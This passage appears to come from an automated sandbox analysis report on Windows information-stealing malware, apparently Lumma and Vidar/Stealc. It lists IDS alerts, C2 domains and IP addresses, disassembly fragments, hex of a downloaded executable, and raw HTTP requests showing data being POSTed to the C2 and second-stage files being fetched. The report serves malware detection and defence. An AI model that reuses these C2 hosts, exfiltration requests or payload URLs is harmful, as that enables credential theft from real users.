Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	13_2_00B43B2E
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp eax, C0000004h	13_2_00B35CD6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00B5BC78
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then xor eax, eax	13_2_00B43DCE
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00B25E98
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	13_2_00B25E98
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then jmp eax	13_2_00B2DE12
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 69F07BF2h	13_2_00B3FE00
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_00B47F88
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 64567875h	13_2_00B5BF18
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	13_2_00B5FF78

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056394 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site) : 192.168.2.8:50732 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056400 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site) : 192.168.2.8:55865 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056402 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store) : 192.168.2.8:54212 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056392 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site) : 192.168.2.8:54546 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056406 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site) : 192.168.2.8:61121 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site) : 192.168.2.8:59551 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.8:56268 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2056408 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site) : 192.168.2.8:52448 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site) : 192.168.2.8:63060 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.8:56237 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.8:56237
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.8:56238
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:56266 -> 172.67.166.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:56266 -> 172.67.166.76:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: treatynreit.site
Source: Malware configuration extractor	URLs: questionsmw.stor
Source: Malware configuration extractor	URLs: mysterisop.site
Source: Malware configuration extractor	URLs: soldiefieop.site
Source: Malware configuration extractor	URLs: abnomalrkmu.site
Source: Malware configuration extractor	URLs: absorptioniw.site
Source: Malware configuration extractor	URLs: snarlypagowo.site
Source: Malware configuration extractor	URLs: chorusarorp.site
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.8:56235 -> 162.159.36.2:53

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 03 Oct 2024 13:15:14 GMTContent-Type: application/octet-streamContent-Length: 540536Last-Modified: Thu, 03 Oct 2024 12:52:19 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fe9383-83f78"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 24 b2 eb 8a 60 d3 85 d9 60 d3 85 d9 60 d3 85 d9 b3 a1 86 d8 6c d3 85 d9 b3 a1 80 d8 ca d3 85 d9 b3 a1 81 d8 75 d3 85 d9 a2 52 81 d8 72 d3 85 d9 a2 52 86 d8 74 d3 85 d9 b3 a1 84 d8 65 d3 85 d9 60 d3 84 d9 39 d3 85 d9 a2 52 80 d8 2e d3 85 d9 93 51 8c d8 61 d3 85 d9 93 51 7a d9 61 d3 85 d9 93 51 87 d8 61 d3 85 d9 52 69 63 68 60 d3 85 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 93 fe 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 c8 01 00 00 5a 06 00 00 00 00 00 72 6f 00 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 6d 02 00 3c 00 00 00 00 30 08 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 16 08 00 78 29 00 00 00 40 08 00 ec 1a 00 00 78 50 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 4f 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 34 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 94 00 00 00 e0 01 00 00 96 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 a4 05 00 00 80 02 00 00 96 05 00 00 62 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 30 08 00 00 02 00 00 00 f8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ec 1a 00 00 00 40 08 00 00 1c 00 00 00 fa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 49.12.197.9 49.12.197.9
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 147.45.44.104 147.45.44.104

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56237 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49714 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49713 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49715 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56240 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56239 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56238 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56241 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56244 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56242 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56245 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56247 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56249 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56250 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56251 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56252 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56253 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56257 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56256 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56255 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56254 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56258 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56265 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:56259 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56262 -> 49.12.197.9:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 5957Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFCAAECBGDGDHIEHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDHJECFCFCAKFHCFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 130417Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGIIDBKEBFBGCAEBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: advocachark.store
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: playd.healthnlife.pkCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3177Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

4_2_00406963

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: playd.healthnlife.pkCache-Control: no-cache

Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.ste equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: playd.healthnlife.pk
Source: global traffic	DNS traffic detected: DNS query: soldiefieop.site
Source: global traffic	DNS traffic detected: DNS query: questionsmw.store
